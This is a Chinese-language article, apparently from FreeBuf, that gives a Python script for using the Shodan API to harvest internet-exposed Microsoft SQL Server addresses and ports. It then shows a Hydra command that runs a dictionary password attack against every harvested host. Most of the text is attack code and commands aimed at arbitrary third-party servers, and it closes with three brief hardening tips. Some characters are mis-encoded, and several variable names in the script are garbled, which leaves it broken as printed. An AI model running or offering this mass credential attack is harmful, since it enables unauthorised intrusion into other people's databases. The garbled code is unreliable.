基于ShodanPython庫的批量攻擊實(shí)踐
作者:gaearrow
本文以MSSQL服務(wù)器為切入點(diǎn),以解決批量目標(biāo)發(fā)現(xiàn)為目標(biāo),介紹了一種基于Shodan Python庫的攻擊方法。
SQL Server的弱口令入侵案例層出不窮,利用工具也大量存在,本文以MSSQL服務(wù)器為切入點(diǎn),以解決批量目標(biāo)發(fā)現(xiàn)為目標(biāo),介紹了一種基于Shodan Python庫的攻擊方法。希望能給有類似需求的同學(xué)提供參考。
一、基本思路
首先利用Shodan的Python庫獲取并實(shí)時處理MSSQL服務(wù)器IP及1434端口Banner,得到IP和MSSQL連接端口的組合列表;然后利用Hydra進(jìn)行字典口令攻擊。
|
SQL Server服務(wù)使用兩個端口:TCP-1433、UDP-1434。其中1433用于供SQL Server對外提供服務(wù),1434用于向請求者返回SQL Server使用了哪個TCP/IP端口。 —— 百度百科-1433端口 |
二、實(shí)現(xiàn)腳本
實(shí)現(xiàn)過程詳見腳本中的注釋
- # -- coding:utf-8 --
- # Python v2.7.10
- # MSSQL.py
- # Written by Gaearrow
- import shodan
- import sys
- # API_KEY
- API_KEY = "YOUR_API_KEY"
- query = "product:\"Microsoft SQL Server\""
- # 處理輸入
- if len(sys.argv) != 3:
- print 'Usage: MSSQL.py <page start:1,2...> <page end:1,2...>'
- sys.exit(1)
- pagestart = int(sys.argv[1])
- pageend = int(sys.argv[2])
- try:
- # 初始化輸出文件
- ofilename = 'page'+str(pagestart)+'to'+str(pageend)
- ofilesrc = ofilename+'_src.txt'
- ofileip = ofilename+'_ip.txt'
- fsrc = open(ofilesrc,'w')
- fip = open(ofileip,'w')
- # 統(tǒng)計變量
- numofport = 0
- numofnoport = 0
- rstlist = 0
- # 逐頁檢索
- api = shodan.Shodan(API_KEY)
- rsttotal = api.count(query)
- maxpage = (rsttotal['total']+99)/100
- if pageend > maxpage:
- pageend = maxpage
- for page in range(pagestart,pageend+1):
- result = api.search(query,page)
- for mssql in result['matches']:
- # 從Banner中解析MSSQL的連接端口
- ## 刪除換行
- ip = mssql['ip_str'].strip('\n')
- ## Ignore IPv6
- if len(ip) > 15:
- continue
- ## 跳過特殊字符
- banner = mssql['data'][3:]
- ## 檢查Banner
- if banner.find('ServerName') < 0:
- continue
- pos = banner.find('tcp;')
- if pos > 0:
- strlist = banner[pos:].split(';')
- if strlist[1].find('np') < 0:
- ### tcp;1234;np;..
- ipipport = ip+':'+strlist[1]
- numofportnumofport = numofport + 1
- else:
- ### tcp;np;..
- ipipport = ip+":1433"
- numofnoportnumofnoport = numofnoport + 1
- else:
- ### no 'tcp;'
- ipipport = ip+":1433"
- numofnoportnumofnoport = numofnoport + 1
- print >>fip,ipport
- print >>fsrc,mssql['ip_str']
- print >>fsrc,mssql['data'][3:]
- rstlistrstlist = rstlist + 1
- # 打印統(tǒng)計信息
- print >>fsrc,'==================================='
- print >>fsrc,'Shodan Summary Information'
- print >>fsrc,'Query : ', query
- print >>fsrc,'Total Results : ', rsttotal['total']
- print >>fsrc,'List Results : ', rstlist
- print >>fsrc,'Page Start : ', pagestart
- print >>fsrc,'Page End : ', pageend
- print >>fsrc,'Port Assigned : ',numofport
- print >>fsrc,'Port Unassigned : ',numofnoport
- print >>fsrc,'==================================='
- except Exception as e:
- print 'Error: %s' % e
- sys.exit(1)
- fsrc.close()
- fip.close()
三、執(zhí)行示例
1. 執(zhí)行環(huán)境
- root@kali2:~/app/mssqlnew# uname -a
- Linux kali2 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux
- root@kali2:~/app/mssqlnew# python -V
- Python 2.7.9
2. 獲取地址端口組合列表
- root@kali2:~/app/mssqlnew# python MSSQL.py 1 10
page1to10_src.txt
page1to10_ip.txt
3. hydra字典攻擊
攻擊耗時及成功率與用戶、口令字典有緊密關(guān)系,網(wǎng)絡(luò)帶寬也影響速度。
root@kali2:~/app/mssqlnew# hydra -L sqluser.dic -P sqlpass.dic -t 30 -M page1to10_ip.txt mssql
四、安全建議
- 設(shè)置MSSQL僅限本地連接
- 修改MSSQL的默認(rèn)連接端口
- 分級配置各類數(shù)據(jù)庫用戶權(quán)限
責(zé)任編輯:趙寧寧
來源:
FreeBuf
